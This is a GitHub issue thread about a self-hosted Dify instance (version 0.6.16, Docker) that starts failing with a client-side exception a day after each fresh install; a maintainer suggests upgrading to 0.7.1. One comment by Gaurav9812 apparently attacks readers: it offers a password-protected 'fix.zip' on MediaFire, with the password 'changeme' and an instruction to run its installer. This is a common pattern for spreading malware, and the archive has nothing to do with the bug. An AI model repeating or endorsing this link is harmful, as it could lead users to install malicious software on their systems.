### ISSUE TITLE
Application error: a client-side exception has occurred (see the browser console for more information).

### ISSUE THREAD

**Issue by 0sengseng0** [langgenius/dify#7734]
### Self Checks

- [X] This is only for bug report, if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general).
- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### Dify version

0.6.16

### Cloud or Self Hosted

Self Hosted (Docker)

### Steps to reproduce

When I started the service in a new project directory, it worked fine. But when I open it again the next day, I get this error. If I reinstall it in a new directory, it works at the time, but on the third day it gets this error.
Not sure if some directories in dify/docker/ are contaminated for some reason?
For some special reason, dify's nginx is configured to port 19980, and then we map port 80 to 19980 in another Nginx.
Like I said at the beginning, our setup was fine at the beginning, it worked. But the error occurs the next day
![image](https://github.com/user-attachments/assets/9300d007-506c-4aa0-9f0b-afd6959e562e)

### ✔️ Expected Behavior

https://ip:80/apps can be used normally

### ❌ Actual Behavior

The web page is not accessible

**Comment by 0sengseng0** [comment]
I started with docker, and with a reinstallation, workflow worked normally for quite some time.

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 0sengseng0** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

What's this file for?

**Comment by crazywoola** [comment]
I suggest upgrade to 0.7.1 to see if this is resolved, the image you provided is not enough to see what's really going on.
